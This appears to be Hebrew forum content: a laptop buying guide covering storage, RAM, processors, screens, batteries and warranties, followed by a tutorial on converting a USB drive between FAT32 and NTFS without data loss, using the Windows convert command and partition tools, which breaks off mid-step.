כן אם בעבר הייתם קונים IBM, לנובו או דל ויכולתם להניח שמדובר במחשב אמין במינוחד שיחזיק שנים ארוכות – לא כך המצב היום. אם אתם לא מאמינים לי, בקרו באתרי המכירות השונים, דוגמת אמזון וראו, כיצד אותו המותג יכול מצד אחד להציג דגמים עם דירוג מעולה ואחרים עם דירוג נמוך במיוחד ומאות תלונות על תקלות, הרכבה ואמינות מפוקפקת. דווקא מצב זה, שבו אי אפשר לסמוך על כל דגמי המותג, מדרבן אותנו עוד יותר לבחור במחשב משתלם במיוחד ולא כזה שעולה כמו כליה.
מכך גם שהחוויה האישית/חברים/משפחה עם המותג, לא אומרת דבר על הדגם הבא, אלא רק על הדגם הספציפי בו התנסיתם (ואולי אף רק על חלק ספציפי בו). גם אם היה לכם ניסיון נוראי עם אייסר בשנה הראשונה לאוניברסיטה או שאתם זוכרים חסד נעורים לIBM מהעבודה הראשונה שלכם, אין להסיק מכך דבר על דגם נוכחי של המותג, או בכלל.
אז איך בוחרים?
שמים בצד את הניסיון והדעות הישנות – כי הן פשוט לא רלוונטיות יותר ובודקים כל דגם לגופו. לפי מפרט, מחיר, הרכבה, סדרה וביקורות ברשת. גם אם לא היה לכם אייסר או HP, אסוס או LG בעבר, ואפילו אם היה ולא הייתם מרוצים – זה לא אומר דבר על הדגם החדש.
הזיכרון!
יש שרצים לבדוק את המעבד, המסך או הסוללה אבל יותר מכולם – חשוב לבדוק את הזכרונות!
נתחיל בזיכרון הפנימי, הכונן הקשיח, איך שלא תקראו לו, נשאל שאלה אחת לפני הכל-
SSD או לא SSD?
לא משנה אם אתם צריכים מחשב לכריית ביטקוין או רק לגלוש בגלאודס וזוזו דילס – כונן SSD הוא בגדר חובה היום שכן הזיכרון הפנימי הוא צוואר הבקבוק האמיתי. וינדוס 10, אומנם קל ומהיר יחסית, אבל כבר פשוט לא חבר של כונן רגילים. אם יש לכם כונן רגיל, דהיינו HDD סטנדרטי, די מהר תגלו שהביצועים הופכים איטיים ומתסכלים מרגע לדודלי. SSD כבר מזמן לא מותרות אלא הכרח לכל דבר, לכולם.
כבונוס הוא מוסיף אמינות – כי הוא פחות רגיש לטלטולים ומכות (בכל זאת מחשב נייד), זמן סוללה, מהירות הפעלה וכיבוי ועוד. אפשר להתפשר על כמעט כל דבר אחר – מלבד על SSD.
אם החזקתם מברג אי פעם או מוכנים לבקר במעבדה – אפשר כמובן גם להחליף כונן לבד. ביוטיוב תמצאו מדריך פירוק ושדרוג כזה לכמעט כל דגם מחשב קיים.
איזה SSD? איזה נפח כדאי?
יש סוגים שונים של SSD – חיבור SATA, חיבור M.2, חיבור NVMe…מותגים שונים ומהירויות שונות מאוד. לא נתעמק כאן בכמה ולמה – זה לא באמת משנה למשתמש הממוצע שכן כולם טובים מאוד וגם ה'איטי' ביותר (SATA) עדיין מהיר במיוחד לכמעט כל שימוש. הבחירה בכונן NVMe קריטית רק אם אתם מעבירים קבצים גדולים במיוחד מידי יום, כמו למשל עורכי וידאו, צלמים וכד'.
מבחינת נפח – זה כבר תלוי בכם. כבר נתקלתי לא פעם בכאלו שאמרו לי ש'כל העבודה על המחשב הזה', תמונות ומה לא, אך בפועל בקושי ניצלו 20GB כך שגם כונן 120-128GB קטן ומשתלם – יותר מיספיק להם. לאחרים, גם 512 או 1TB לא מספיק. רק קחו בחשבון שלא צריך לאחסן הכל על כונן הSSD. שימרו אותו לתוכנות, מערכת ההפעלה וכמה קבצים בשימוש תדיר. את אוסף המוסיקה והתמונות שלכם – אפשר לשמור בכונן אחר, רגיל, חיצוני, גיבוי או ענן.
אני ממליץ לבחור ב- 256GB – נפח טוב ונוח המספיק לווינדוס על עידכוניו הרבים, תוכנות וקבצים חשובים בנקודת מחיר מעולה.
כיום אף רוב המחשבים כוללים אפשרות לשדרג את הזיכרון עם כונן נוסף בקלות – לרוב בפתיחה קלה של תריס או כמה ברגים בתחתית המחשב, להכניס את הכונן לסלוט ריק ואתם מסודרים. לכן חשוב בעיקר שיהיה מספיק להתנהלות השוטפת עם מערכת ההפעלה וכמה תוכנות, ואת כל שאר התמונות/מוזיקה/סרטים/קבצים וכו' – אפשר לשמור לכונן נוסף/מורחב בהמשך – ובזול (!) שכן רכישה של SSD נפרד, כמעט תמיד זולה משמעותית מהפער בין קניה של דגם עם 256GB לדגם עם 512GB/1TB לדוגמא.
זיכרון הRAM
מיד אחרי הזיכרון הפנימי, מגיע צוואר הבקבוק הבא, הלא הוא זיכרון הראם, או זיכרון העבודה.
יש שאומרים שאפשר להסתדר גם עם 2GB – הם טועים. אפשר להסתדר גם עם כוס תה וביסקוויט ליום, אבל קשה לקרוא לזה להסתדר נכון?
ההמלצה שלי היא קודם כל 8GB ראם. אם אתם ממש לחוצים לפינה ובטוחים שתשתמשו במחשב הזה לשימוש מינמלי ביותר, אז אפשר להתפשר על פחות, אך על כל דבר מעבר – וזה כולל גם 'סתם גלישה ברשת' – 8GB זה פשוט חובה.
האם צריך יותר?
כאן נפתיע ונאמר – לא. רובנו לא צריכים יותר מכך. 8GB יספיקו גם לעבודה שוטפת, משחקים, גלישה, צפייה ב4K, הרצת כמה תוכנות ברקע או אפילו עשרות טאבים פתוחים (מבחן לדוגמא).
אם התקציב מאפשר, או שאתם פותחים את הבוקר עם תוכנת עריכת וידאו/גרפיקה/אוטוקאד וכד' – אז כמובן שעדיף כמה שיותר. 16GB זה מעולה ויספיק גם לסטודנטים לגרפיקה, אנימציה, אדריכלות ועריכת וידאו. כמובן שאם אתם מתכננים את בניין עזריאלי החדש או סרט פיקסאר – אז כמה שיותר, יותר טוב.
המעבד!
מניסיוני, ככל שמבינים פחות בתחום – כך הביטחון העצמי בבחירת המעבד עולה…
זה נראה קל הרי, I7 זה יותר מI3, אז ברור שלי מגיע הכי טוב!
מה זה משנה שיש דורות שונים, ייעודים שונים ושהפער בביצועים כנראה לעולם לא יבוא לידי ביטוי מורגש, בעוד המחיר והפשרות על שאר המפרט – ועוד איך כן.
המחמירים ילכו לאתרי השוואות שונים, יסתכלו סעיף סעיף על הנתונים הטכניים ומהירות המעבד במצב רגיל וטורבו מבלי להבין הרבה ויסיקו מסקנות שגויות, כי לא התייחסו למה שחשוב באמת (כמו מספר ליבות, ליתוגרפיה, אוברקלוקינג ושאר דברים שמיותר להרחיב עליהן כרגע).
זה קצת כמו לבחור רכב לפי מספר הצילינדרים או נפח המנוע בלבד. זה חשוב אמנם, אבל ממש לא הדרך הנכונה לבחור את הרכב הנכון ביותר עבורכם.
אז בואו נעשה לכם קצת סדר:
דור המעבד – לפעמים אפילו חשוב יותר מהדגם עצמו. חברות המעבדים ובעיקר אינטל – מוציאות דור חדש כמעט מידי שנה. כל דור הוא שיפור אבולוציוני לקודמו המשפר את הביצועים, ניהול החום והסוללה. לעיתים השיפורים הם זניחים יחסית, כמו הקפיצה בין דור 6 ל7 ולעיתים דרמטיים – כמו הקפיצה לדור 8, שבנוסף לשלל שיפורים אחרים, מכפיל את מספר הליבות ומשפר את הביצועים כמעט ב40%!
אינטל אף הגדילה לעשות והוסיפה תוכנה קלה לביצוע אובקלוקינג (שיפור ביצועים) המאפשר גם למעבדים חסכוניים כגון הI5-8265U לספק ביצועים גבוהים יותר מסדרות הגיימינג והגרפיקה (HQ) של דור 7! (אך כמובן יש מחיר בצריכת חשמל וטמפרטורה לכן פתרון זה יעיל לפעולות קצרות/בתוספת קירור). במילים פשוטות, אם נניח אתם עורכים את הסרטון שלכם מתאילנד, עם כמה קליקים קלים בהגדרות, תוכלו לשפר את זמן העיבוד והשמירה של הסרטון בעשרות אחוזים.
לכן העדיפו את הדור החדש ביותר, בשאיפה לדור 8 ומעלה במעבדי אינטל ודור RYZEN 3/5/7 מסדרה 3000 ומעלה במעבדי AMD.
איך יודעים איזה דור המעבד?
לצד כל דגם מעבד, כלומר I3/I5/I7/I9 תמצאו גם מספרים ואותיות, כאשר הספרה הראשונה מעידה על הדור. לדוגמא I5-8265U = מעבד I5 מסדרה 8. I5-7200U = מעבד I5 מסדרה 7 וכן הלאה.
דגמי מעבדים:
INTEL
INTEL CORE M – לרוב בתצורת CORE M3 או CORE M5. את המעבדים הללו תמצאו במחשבים דקים וקלים במיוחד או טאבלטים יקרים. הדגש כאן הוא על סוללה לפני הכל. הביצועים טובים לאופיס, גלישה וכד' – אך לא הרבה יותר.
INTEL CORE I3 – המעבד ה'בסיסי' שמתאים לשימושים קלים וקצת יותר. למשתמש הממוצע שמתעסק בעיקר באופיס, דפדפן וכד' – הI3 מספיק בהחלט ועדיף להשקיע בפרמרטים האחרים.
INTEL CORE I5 – המעבד האידאלי לרובינו. חזק מספיק להריץ כמעט כל דבר מבלי להיות יקר מידי. בין אם אנחנו עובדים על וורד, פוטושופ או GTA – הI5 הוא הבחירה העדיפה והמשתלמת לטווח ארוך.
INTEL CORE I7 – המעבד ל'רציניים'. אם אתם גרפיקאיים, עורכי וידאו או מריצים סימולציות מהבוקר עד הערב – תוספת הכוח של הI7 תחסוך לכם עוד כמה דקות יקרות.
INTEL CORE I9 – המעבד המתקדם ביותר בעולם, בגלל המחיר היקר שלו (ראה כאן) רק אם יש לכם תקציב גדול אז הוא מומלץ.
לאלו יש גם תת גרסאות, המאופיינות במספרים ואותיות שונות (לדוגמא I5-8550U עדיף על I5-8250U), גרסאות 'ביצועים' (סימון HQ/H) ועוד ועוד.
בשנים האחרונות AMD עברו מהפכה של ממש. מאנדרדוג זניח והיסטוריה בעייתית, הם קפצו לראש המחנה וכיום אף מובילים על אינטל בהיבטים רבים. אם נחזור רק כמה שנים אחורה, מעבדי AMD נחשבו לבחירה של חסרי התקציב או 'תחליפים שולחניים' בלבד. מעבדים חלשים יותר וחמים בהרבה מאלו של אינטל.
הימים האלו, הם היסטוריה! דור הRYZEN החדש מפתיע עם ביצועים פשוט מעולים, הן בכוח העיבוד והן בכוח המעבד הגרפי ואף עדיף על המקבילים של אינטל, הן בביצועים והן במחיר, למעט ביצועי הסוללה. בשוק הנייחים בפרט הם הציגו מעבדים מרובי ליבות במחירים חסרי תקדים.
הדור החדש של AMD, סדרת הRYZEN 4000, עם דגמי 4800U/4700U/4600U ועוד , מיוצרת בתהליך של 7 ננומטר להבדיל מה- 10 ננומטר של אינטל. במילים אחרות – AMD מובילים כאן עם תהליך ייצור יעיל בהרבה השווה לביצועים, טמפרטורה, מחיר ועוד העדיפים על הדור העשירי של אינטל.
לכן הימים שבהם מעבד AMD היה גורם מרתיע – עברו וחלפו מהעולם. דעות קדומות על AMD זה פחות טוב/לא לרצינים/עבודה/גיימרים, חוסר התאמה עם תוכנות ודרייברים – הן פשוט…דעות קדומות וחסרות בסיס היום. דווקא גיימרים, גרפיקאים ועורכי וידאו – אלו שקונים לרוב את המפרט החזק והעדכני ביותר בשוק – בוחרים לרוב – AMD, הן בגלל הביצועים והן בגלל התמורה למחיר.
לסיכום בקצרה:
מיני מחשבים, טאבלטים משולבים,לפטופים בסיסיים לגלישה, מסמכים (אופיס) ושימושים קלים בלבדבאזור האלף ש"ח – יותר חשוב ראם, זיכרון מסך וכו' מאשר המעבד וניתן להסתפק ב Intel Gemini Lake N4100, סלרון, CORE M.
לרובינו המכריע שרוצה קצת מהכל –
CORE I5 8265U ומעלה או RYZEN 5 ומעלה.
(דור אחרון כרגע – i5-10210U או סדרה RYZEN 5/7 4000+)
למשתמשים ה'כבדים' שצריכים כוח עיבוד רציני – קרי עובדים עם פוטושופ, עריכת וידאו, קימפול, סימולציות ושאר משימות תובעניות – I7 דור 10/9 או RYZEN 7 דור 4000 ומעלה
המסך!
מבחינת הגודל –
"10-12.5 – לטעמי, גודל קטן מידי ולא נוח. רלוונטי בעיקר לאנשי עסקים עסוקים במיוחד, שמבלים הרבה בטיסות צפופות או לחילופין – אם יש כבר מסך גדול ועמדת עגינה.
13.3-14 – הגודל האידאלי!
גודל נוח לעבודה, מבלי לכווץ את העיניים. מאפשר להציג שני מסמכים צד לצד בנוחות, לצפות בסרט ממרחק נוח ועוד. מחשבים בגודל זה לרוב קלים ונוחים לנשיאה. המסך גם לא גבוה מידי כך שאם אתם בישיבה או בהרצאה באוניברסיטה – המסך לא מסתיר את המרצה או אתכם אתכם. הפשרה הטובה ביותר בין גודל, משקל ונוחות.
15-15.6" – מחשב 'עבודה' או תחליף שולחני ופחות מחשב לשאת אותו על הגב כל יום. גודל מסך זה מלווה בדר"כ במשקל גבוה משמעותית ממסכי ה-13/14". מחשבים בגודל זה עם משקל נמוך – הם לרוב יקרים יחסית. לכן ביחרו בגודל זה אם:
אתם לא נושאים את המחשב על הגב זמן רב.
מעדיפים נוחות וביצועים על פני ניידות ומשקל.
הערה חשובה!
קיימים כיום דגמים רבים עם שוליים דקיקים המקנים לכם מסך 15.6" בגודל פיזי של מחשב 14" או אף 13.3", לכן חשוב גם להתייחס לגודל הפיזי של המחשב כמובן (בעיקר בהיבט עובי השוליים שמסביב למסך).
מבחינת הרזולוציה –
FHD הוא מה שאתם מחפשים. לא 1366768 כבדגמים ישנים יותר, אלא 19201080 ולא פחות.
היום כבר יש דגמים עם מסכי 2K ואף 4K אולם מעטים מכם ימצאו בכך תועלת או צורך ממשי.
גם על הרזלוציה אני לא ממליץ להתפשר – זה משפיע לא רק על חוויית השימוש שלכם במחשב מידי יום, אלא גם על השימושיות. רזולוציה גבוהה יותר מאפשרת להכניס יותר למסך, מה שאומר לגלול פחות, לפתוח יותר טאבים וכן הלאה.
לא מעניין אותנו במיוחד אם המסך הוא מסוג מאט או מבריק. אני אישית מעדיף מבריק לטובת תצוגה יפה וחדה יותר, אבל אפשר 'להמיר' כל תצוגה מבריקה למאט, עם מגן מסך/פילטר זול.
מסך מגע!
היו לי לא מעט מחשבים עם מסך מגע. זה נחמד מאוד בהתחלה, כלומר היום הראשון, אולי גם השני אבל מהר מאוד מגלים שזה די מיותר ואין באמת תועלת גדולה בממשק המגע. כשאפשר להשתמש במקלדת ובעכבר בדיוק ובמהירות, למה להרים ידיים כל פעם ולכלך את המסך?
לא ממש יעיל ולא ממש שימושי.
מתי זה כן חשוב? אם אתם רוצים מחשב 2 ב-1, כלומר כזה שהמסך מסתובב גם למצב טאבלט (ושימו לב למשקל) או אם אתם מאיירים/גרפיקאים ורוצים מסך התומך גם בעט לכתיבה וציור.
המשקל!
פשוט מאוד. אם זה מחשב שמיועד בעיקר להיות תחליף שולחני. כזה ששמים בתיק רק כשיוצאים לאיזו חופשה כפויה אצל החמות – אז המשקל לא באמת משנה.
אם אתם סטודנטים, אנשי עסקים וכד' שנושאים את המחשב מידי יום על הגב/כתף ולא רוצים להגיע מיוזעים לפגישה או ההרצאה שלכם, ביחרו במחשב קל – בשאיפה לאזור ה1.6 קילו ומטה (לגודל 14").
אם אתם נושאים את המחשב מידי יום אבל בעיקר בין האוטו למשרד – אפשר להתפשר על מקום טוב באמצע – סביב ה1.9-2 קילו.
קחו בחשבון שלרוב המשקל המצויין במפרטים לא כולל את ספק הכוח והכבל.
כרטיס המסך!
אם אתם רוצים מחשב לגלישה ואופיס – אז זה לא משנה.
אם אתם רוצים מחשב שיכול גם לערוך סרטים או להריץ משחקי רשת/כותרים ישנים בהגדרות בינוניות ומטה – חפשו עם כרטיס גרפי עדכני כגון GEFORCE MX250 או VEGA 10 ומעלה (IRIS/רייזן החדשים הצפויים לצאת בקרוב).
אם אתם גרפיקאים, עורכי וידאו, גיימרים וכד' – חפשו מחשב עם כרטיס גרפי ייעודי ועדכני כגון הGTX 1650 ומעלה ואל תתפשרו על ה1050 הישן. הדגמים הנפוצים היום, מהחזק לחלש
GeForce RTX 2080 – למי שצריך הכל…4K ועוד
GeForce RTX 2070 – לעיבוד גרפי ווידאו מהיר וחזק, VR, גיימינג ב2K ועוד
GeForce RTX 2060
GTX 1660 Ti/GTX 1660/GTX 1650 – לגיימינג בFHD, גרפיקה ועוד במחיר משתלם.
המקלדת!
אל תחששו לרכוש מחשב מחו"ל בגלל המקלדת! אפשר להחליף שפה ופריסת מקלדת בוינדוס ועל המקלדת כמובן – אפשר לצרוב אותיות (כ100-150 ש"ח לצריבת לייזר) או לחילופין בהרבה פחות (ומומלץ!) לרכוש מדבקות טובות עם עברית בגרוש (בנגוד, אליאקספרס) או פשוט ללמוד הקלדה עיוורת!
האחריות!
כבכל מוצר, יש לקחת בחשבון גם את האחריות כמובן. מה היא באמת מכסה, כמה סביר שנקבל בכלל פתרון במקרה הצורך (ואם סביר שנשתמש בה בכלל). בקניה בארץ, מומלץ לחפש אחר אחריות ארוכה יותר משנה, עם איסוף מבית הלקוח. אם בקניה מחו"ל – נוודא שפער המחיר טוב מספיק ובעדיפות נקנה מאמזון עם האחריות הטובה בעולם!
אינספור דוגמאות לשירות הפשוט מדהים של אמזון תוכלו למצוא ברשת. האחריות של אמזון ארה"ב היא לשנה אחת, אולם ללא מעט דגמים יש גם אחריות יצרן ואף אחריות בינלאומית נרחבת יותר.
איך ממשים את האחריות? פשוט פונים לשירות הלקוחות במייל/צ'אט/טלפון (קיצורי דרך במדריך אמזון), מסבירים מה התקלה ומקבלים מענה. לרוב יפנו אתכם קודם לקבל שירות מהיצרן. אם תתעקשו קצת – אמזון בדר"כ יציעו לכם מחשב חדש/זיכוי מלא. אם תידרשו לשלוח אותו חזרה לתיקון/החלפה – גם על דמי המשלוח תקבלו החזר מלא (ותופתעו לעיתים לראות שהם אפילו לא דורשים אותו בחזרה…). אמריקה.
מערכת ההפעלה!
אם אתם מביני עניין – אתם יכולים כמובן להתקין לבד (לא חסר מדריכים כאן בפורום). אם לא – עדיף לקנות מחשב עם מערכת הפעלה מותקנת, וינדוס 10 כמובן ולחסוך התעסקות מיותרת. גם עבורי, כאחד שיודע להתקין מערכת הפעלה ללא קושי עם יד קשורה מאחורי הגב – אעדיף תמיד עם מערכת הפעלה כלולה. פער המחיר לרוב פשוט לא שווה את ההתעסקות והזמן של להתקין לבד.
CHROMEBOOK
ואם כבר במערכות הפעלה עסקינן…כרומבוק הוא מחשב מבוסס מערכת הפעלה כרום OS. רגע כרום זה לא הדפדפן שלנו? בדיוק. זו מערכת הפעלה שהיא ברובה – דפדפן, פשוט בעיצוב המזכיר קצת יותר שולחן עבודה רגיל בויינדוס. בכרומבוק לא מתקינים תוכנות וגם לא מאחסנים הרבה. הרעיון כאן הוא לקבל מערכת הפעלה רזה וקלה במיוחד שיכולה לרוץ גם על מפרטים חלשים וזולים במיוחד ולהשתמש בשירותי ענן לכמעט הכל.
הרעיון עצמו? מצויין. ממילא אנחנו רוב הזמן בדפדפן, שולחים מייל עם ג'ימייל, עובדים עם שלל שירותי ענן וכו'. רובינו גם לא צריכים יותר מזה…אבל עדיין, חוסר האפשרות להתקין תוכנות 'רגילות' כשצריך, הצורך להיות מחוברים לרשת כל הזמן, מפרט בסיסי במיוחד ולרוב גם עיצוב, רזולוציה וכו' בסיסיים מאוד הופכים את הקניה של כרומבוקים לעניין למתי מעט בלבד. כיום כשבאותו המחיר של כרומבוק בסיסי ניתן להשיג מחשבי ווינדוס עדיפים בכמעט כל היבט מבית שלל יצרנים סינים פופלאריים כגון CHUWI וTECLAST או בהפרש זניח לקבל לפטופ 'רגיל' עם ווינדוס, קשה להמליץ על כרומבוק לצרכן הממוצע ולא מפתיע שהם אוחזים בנתח שוק מזערי עדיין ופופלאריים במיוחד רק בקרב ילדים בבתי ספר באמריקה. בקיצור, לוותר.
ביקורות
לדעת לקרוא ביקורות נכון, היא אומנות בפני עצמה. סביר להניח שאם אתם נעזרים במדריך זה מלכתחילה, אזי אתם עוד לא ניחנים במספיק ניסיון בכדי לברור את המוץ מהתבן. באתרים השונים, בין אם זאפ או אמזון תמצאו הרבה מאוד ביקורות לא ענייניות. באמזון בפרט יש ביקורות רבות מטעם רוכשים שקיבלו את המחשב בחינם, כאלו שמתלוננים בכלל על המשלוח, או עדכון כלשהו בוינדוס, לא יודעים לתפעל טוב את המערכת או תוכנה מסויימת וכן הלאה.
עוד רעה חולה באמזון היא צרוף כל הביקורות של ה'דגם' באותו הדף. כך אנו מקבלים גם ביקורות של אחד שקנה את גרסאת הI7 החזקה וגם את זו שקנה את גרסאת הI3 הפשוטה באותו הדף ויותר מכך – אף דורות שונים ושנים שונות, גם כשהדגם הוא כבר למעשה שונה לגמרי, למעט השם. אז קחו בחשבון את התאריך והדגם הספציפי שעליו הרוכש מעיד ואל תפסלו ישר כי יש רק 3 או 4 כוכבים ולא 5.
חשוב גם להתמקד בתלונות על החומרה עצמה – אמינות חלקים, הרכבה וכד', מסוקרים המסתמנים לכם כמביני עניין ופחות בתקלות ותלונות אחרות כי לא מעט מהתגובות יכולות להיות מסבתא/ילד שפשוט לא יודעים לעבוד טוב עם המחשב…
שונות ופשרות
אם התקציב שלכם גמיש והדרישות ריאליות, אפשר כמובן למצוא מחשב 'אידאלי', לפחות על הנייר, עם כל הפיצ'רים שאתם רוצים. אבל, אם אתם מחפשים מחשב עם תמורה טובה למחיר – תתצטרכו להתפשר קצת. אל תיתפסו על תאורת מקלדת, מספר חיבורים, צבע וכהנה וכהנה. תזרמו עם הדיל הכי טוב שזמין לכם. לכל השאר אפשר למצוא פתרון קל וזול או פשוט להתרגל.
ALL IN ONE
אל תדאגו, זו לא טעות. אנחנו עדיין במדריך ללפטופים, אך זו נקודה שחשוב להבהיר. מחשבי 'הכל באחד' הופכים פופלאריים יותר לאחרונה, ולא בהכרח בצדק. יש כאלו טובים מאוד כמובן, אך רובם – יקרים משמעותית מקניית מחשב נייח ומסך, תוך התפשרות משמעותית על המפרט ועוד.
פתרון חכם יותר הוא פשוט לקנות מחשב נייד ומסך! כך תהנו מכל היתרונות ללא החסרונות!
את הלפטופ אפשר להצמיד מתחת לשולחן או מאחורי המסך. אפשר לשדרג את המסך או הלפטופ כשרוצים/צריך ולא פשוט לזרוק את המחשב עם המסך כבמחשבי 'הכל באחד' כי רכיב מסויים התקלקל/מיושן.
מקלדת ועכבר – ממילא אפשר אלחוטיים ובזול וכבונוס – נהנה ממחשב נייד אם נצטרך!
חכם יותר, משתלם יותר ולא פחות יפה.
הסוללה
במפרטים הסוללה לעיתים מתוארת כמספר תאים (4 CELL), כנתון חשמלי כלשהו (62WHr) או כשעות סוללה.
הנתון היחיד המעניין אותנו הוא שעות הסוללה שכן כל השאר לא באמת אומר לנו כלום כי כל מחשב עם שלל מרכיבים וצריכת זרם משלו.
רוב המחשבים הניידים מבטיחים סוללה של כ8 שעות פלוס מינוס ובפועל נותנים הרבה פחות…התייחסו לזמן הסוללה של היצרן כמו נתוני צריכת הדלק של יצרני המכוניות…מדובר בנתון אפשרי, בתנאי מעבדה אידאלים ולרוב אופטימי בהרבה ממה שנקבל בפועל. לרובינו זה סביב ה5-6 שעות זה בהחלט מספיק וריאלית – בכל מקום היום יש תקע זמין, בין אם אתם בשדה התעופה, במטוס, בארומה, ברכבת או באוניברסיטה.
אבל, השנה מגיחים סוף סוף מחשבים בליגה אחרת – עם סוללה של 20-24 שעות וזו כבר חווית שימוש אחרת לגמרי. לא צריך לדאוג למטען או בכלל לשאת אותו איתכם בתיק. המחשב הופך להיות נייד באמת ויכול לנדוד אתכם לספה, למיטה ולפגישה בלי להיות כבול לכבל.
דגמים בולטים עם זמן סוללה כזה הם האסוס ASUS VivoBook 14 X403, הLG GRAM ומחשבים מבוססי מעבדי קואלקום שצפויים לנחות בשוק בשנה הקרובה.
קניתם מחשב? מזל טוב
אם אין מערכת הפעלה, ניתן להיעזר במדריך כאן, ולהתקין עליו את הרכיבים הנחוצים.
ואם יש מערכת הפעלה או שאר דברים שהמחשב צריך אפשר להמשיך במדריך המושקע של @A0533057932כאן.
רוצים עוד כל מיני תוכנות?
אפשר להיכנס כאן ולראות שלל תוכנות מגוונות ומעניינות בהתקנה נחה ומהירה.
בעקבות כמה פוסטים שראיתי לאחרונה כמו כאןוכאן, חשבתי לתועלת הרבים להסביר איך לפרמט מערכת קבצים בלי צורך לרוקן את החומר הקיים בהתקן הנשלף.
ראשית כל צריך להבין מה התועלת בכל סוג מערכת קבצים.
אני ממליץ לעבור במהירות על המדריך הבא כדי להבין מה אנו עושים בפועל.
לכל מי שאין לו כח לעבור על המדריך אז בטבלה הבאה הוא יקבל הבנה מהירה על ההבדלים ביניהם:
בכל אופן ההתקן נשלף או הדיסק קשיח חיצוני שאנחנו קונים מהחנות מגיע עם סוג קבצים ברירת מחדל של FAT32 (לא כולם), ולכן כשרוצים להעתיק קובץ גדול מ - 4 GB נתקלים בהודעה הבאה:
והפתרון זה לפרמט את מערכת הקבצים שהיא לא FAT32:
אבל הרבה פעמים אנו נתקלים בהודעה כזאת וכבר יש לנו הרבה חומר בפנים, ולכן הפתרון של לרוקן, לפרמט ולהחזיר את החומר בחזרה קצת מקשה עלינו, במיוחד בדור שלנו שאפשר למצוא פתרונות הרבה יותר מהירים.
ולכן במדריך הזה נעסוק איך לפרמט את מערכת הקבצים ללא איבוד החומר.
המרה FAT32 ל - NTFS
ישנם כמה דרכים לעשות את זה אבל אנו נעסוק רק בחלק מהם היותר מוכרים.
שורת הפקודה (CMD)
AOMEI Partition Assistant
MiniTool Partition Wizard
דרך שורת הפקודה
תחילה נפתח את שורת הפקודה דרך הפעל כמנהל מערכת, למי שלא יודע יכול היעזר במדריך כאן.
ואז נכתוב את הפקודה הבאה:
convert E: /fs:ntfs
במקרה שלי האות :E זה האות של הכונן שאני רוצה לפרמט, אתם תבדקו מה האות של הכונן ותחליפו לפי הצורך.
ואז תקבלו את ההודעה הבאה:
כמובן שניסיתי את הפקודה הזאת על התקן נשלף שיש בתוכו חומר והכל נשאר אותו דבר
דרך AOMEI Partition Assistant
תחילה אנו צריכים להוריד את התוכנה, אפשר למצוא את התוכנה ברחבי הרשת והפורום או להיכנס כאן.
אחרי שמתקינים את התוכנה, אנו מקליקים כמו בתמונה:
בחר את המחיצה שברצונך להמיר. על המסך תקבל ייעוץ לבדוק את המחיצה עם chkdsk.exe לפני שתמשיך הלאה. כאשר הכל נראה בסדר לחץ על "Proceed" והמתין שמדריך ההמרה יגיב ויבוצע.
או לחילופין אפשר לעשות גם כך:
דרך MiniTool Partition Wizard
תחילה אנו צריכים להוריד את התוכנה, אפשר למצוא את התוכנה ברחבי הרשת והפורום או להיכנס כאן.
אחרי שמתקינים את התוכנה, אנו מקליקים כמו בתמונה:
מחכים מעט זמן (הזמן תלוי בכמה דברים כגון: כמות החומר הקיימת באחסון או מהירות המחשב)
אפשר לראות בחלון שהתהליך הושלם ואז אפשר לסגור את התוכנית.
שימו לב, לפעמים מקבלים הודעה כזאת כשרוצים לבצע המרה:
תרגום ההודעה:
"המחיצה נמצאת כרגע בשימוש ואי אפשר לבצע המרה, האם תרצה להפעיל כח לניתוק השימוש?"
ובוחרים "YES"
ואם נתקלים בהודעה הבאה:
זה אומר שהתוכנה לא הצליחה לנתק את הכונן מהשימוש, ולכן היא שואלת האם תרצה שהתוכנה תשמור את ההגדרה של ההמרה ואז בהפעלת המחשב בפעם הבאה התוכנה תעשה המרה דרך ה - DOS של המחשב?
אם אתה רוצים אפשר ללחוץ "YES" ואז בהפעלת המחשב בפעם הבאה תראו שהתוכנה עושה המרה להתקן.
בכל אופן אפשר לפתור את הבעיה של ההתקן נמצא בשימוש דרך תוכנות חיצוניות (כמו זה למשל) ואז לא תהייה בעיה לתוכנה להמיר את מערכת הקבצים.
במקרה שלי הרצתי וירוס קטן על ההתקן כדי לגרום לתוכנה שלא תצליח לעשות המרה כי ההתקן נמצא בשימוש:
וכאשר מחקתי את הוירוס, ההמרה עבדה רגיל בלי הודעות נוספות.
המרה NTFS ל - FAT32
למה זה נצרך?
NTFS ו- FAT32 הן מערכות קבצים שונות המסייעות ל- Windows לקרוא נתונים במחיצת הכונן הקשיח. FAT32 היא מערכת קבצים ישנה יותר בהשוואה ל- NTFS, ולכן יש לה תאימות גבוהה יותר בין מערכות הפעלה שונות כמו Linux, Mac, XBOX One, PS3, PS4, 3DS, וכן הלאה. כתוצאה מכך, הוא פופולרי בקרב כוננים קשיחים חיצוניים כמו WD My Passport וכונני הבזק מסוג USB. עם זאת, מחיצה עם עיצוב FAT32 אינה יכולה לאחסן קובץ יחיד שגודל גדול מ -4 GB.
באופן כללי, NTFS מתאים יותר למחיצת מערכת מכיוון שיש לו מאפיינים מתקדמים רבים המועילים למערכת ההפעלה של Windows. למרות של- FAT32 יש מגבלה טבועה, משתמשים רבים מחפשים את הדרך להמיר NTFS ל- FAT32.
ישנם כמה דרכים לעשות את זה אבל אנו נעסוק רק בחלק מהם היותר מוכרים.
AOMEI Partition Assistant
MiniTool Partition Wizard
Windows Disk Management (נדרש לרוקן את החומר)
דרך AOMEI Partition Assistant
אנו מקליקים כמו בתמונה:
אגב, לא חייב לסמן על V על check and repair ואפילו היית מוסיף שזה לא מומלץ.
בסיום תהליך ההמרה אפשר לסגור את התוכנה ולראות שהכל תקין לחלוטין.
דרך MiniTool Partition Wizard
אנו מקליקים כמו בתמונה:
דרך Windows Disk Management (נדרש לרוקן את החומר)
אני אישית לא ממליץ על הדרך הזאת, היא לחלוטין מיותרת ואינה נצרכת, אך לא נמנעתי להביאה למען הסדר הטוב.
לכאורה הדרך הפשוטה זה להעתיק למחשב ולהחזיר בחזרה להתקן ולא צריך לעשות את הפעולות הבאות, אבל לפעמים אין לנו מקום במחשב או כל סיבה אחרת ולכן מגיע הפתרון הבא.
נכנסים ל - "ניהול דיסקים" ע"י הפקודה diskmgmt.msc בחיפוש התחל או דרך "הפעלה" (WIN + R).
ואז בוחרים את כמות האחסון שאתם רוצים לכווץ ולוחצים על "כווץ"
שימו לב, כמות האחסון שאתם רוצים לכווץ תלויה בחומר שיש לכם על המחשב, לדוגמא:
